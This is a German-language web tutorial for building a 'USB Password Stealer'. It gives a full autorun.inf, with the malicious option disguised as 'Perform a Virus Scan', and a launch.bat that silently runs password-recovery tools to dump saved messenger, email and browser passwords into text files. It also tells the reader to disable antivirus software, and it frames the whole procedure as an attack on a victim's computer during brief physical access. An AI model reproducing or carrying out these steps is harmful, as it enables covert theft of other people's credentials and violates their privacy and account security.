Loading…

USB Password Stealer Tutorial

Jedes Sicherheitssystem hat eine Schwachstelle und alle Sicherheitssysteme haben die gleiche Schwachstelle – Der Mensch. Die meisten Leute kreuzen einfach „Remember Me“ auf  den besuchten Webseiten an, da dies bequem ist. Das passiert besonders oft bei privaten Computern, welche nicht von anderen benutzt werden, oft aber auch auf  Dienstgeräten, zu denen sich ein Hacker für nur wenige Sekunden Zugang verschaffen muss, um sämtliche gespeicherten Passwörter auszulesen.

USB Stick

In diesem Tutorial zeige ich dir Schritt für Schritt, wie du dir einen USB Password Stealer erstellen kannst. Diesen Hack habe ich erfolgreich unter folgenden Betriebssystemen durchgeführt: Windows 2000, XP, Vista, 7 und 8.
WICHTIG: Für diesen Hack benötigt der Angreifer physischen Zugang zu dem Computer des Opfers.

Benötigtes Equipment

 

Zusätzlich benötigen wir diverse Software um die Passwörter auszulesen. Hier ein paar Beispiele, welche ich für dieses Tutorial genutzt habe:

  • MessenPass – Link zum kostenfreien Download
    MessenPass ist ein Passwort-Wiederherstellungs-Tool, das die Passwörter einiger gängiger Instant-Messenger-Anwendungen aufdeckt.
  • Mail PassView – Link zum kostenfreien Download
    Mail PassView ist ein kleines Passwort-Wiederherstellungs-Tool, das die Passwörter und andere Kontodetails für beispielsweise Outlook Express, Windows Mail, POP3 enthüllt.
  • IE Passview – Link zum kostenfreien Download
    IE Passview ist ein weiteres kleines Programm, mit dem gespeicherte Passwörter im Internet Explorer angezeigt werden können.
  • Protected storage PassView (PSPV) – Link zum kostenfreien Download
    Protected Storage PassView ist ein kleines Dienstprogramm, das die Kennwörter von Internet Explorer, Outlook Express und MSN Explorer anzeigt.
  • Password Fox – Link zum kostenfreien Download
    Password Fox ist ein kleines Programm, mit dem gespeicherte Passwörter in Mozilla Firefox angezeigt werden.

 

Hinweis: Diese Programme neigen dazu, viel Aufmerksamkeit von Antivirus-Software zu bekommen. Bitte deaktiviere dein Antivirenprogramm, bevor du die Schritte ausführst. Natürlich gibt es diverse weitere Programme für weitere Messenger oder Browser wie Chrome, Opera usw. – Link zu weiterer Software

Schritt 1 – Software Download

  • Lade zuerst alle Tools auf deinen USB-Stick. Die Tools sind nur einige .exe-Dateien (mspass.exe, mailpv.exe, iepv.exe, pspv.exe und passwordfox.exe).

Schritt 2 – autorun.inf erstellen

  • Erstelle ein neues Notepad-Dokument und schreibe den folgenden Text hinein:
    [autorun] open=launch.bat
    ACTION= Perform a Virus Scan
  • Speicher das Notepad-Dokument, und benenne es in „autorun.inf“ um.

Schritt 3 – launch.bat erstellen

  • Erstelle ein weiteres Notepad-Dokument mit folgendem Inhalt:
    start mspass.exe /stext mspass.txt
    start mailpv.exe /stext mailpv.txt
    start iepv.exe /stext iepv.txt
    start pspv.exe /stext pspv.txt
    start passwordfox.exe /stext passwordfox.txt
  • Speicher das Notepad-Dokument und benenne es mit „launch.bat“.

Schritt 4 – USB-Stick vorbereiten

  • Kopiere die autorun.inf und launch.bat auf den USB-Stick.

Schritt 5 – Einen Angriff ausführen

  • Stecke den USB-Stick in den Computer des Opfers, und das Autostart-Fenster wird geöffnet.
  • Wähle im Popup-Fenster die erste Option aus (Perform a Virus Scan).
  • Jetzt werden alle Tools zur Kennwortwiederherstellung im Hintergrund ausgeführt (Dieser Vorgang dauert nur wenige Sekunden). Die Passwörter werden in der .txt Datei gespeichert.
  • Entferne den USB-Stick, und schau dir die gespeicherten Passwörter in der .txt Datei auf deinem eigenen Rechner an.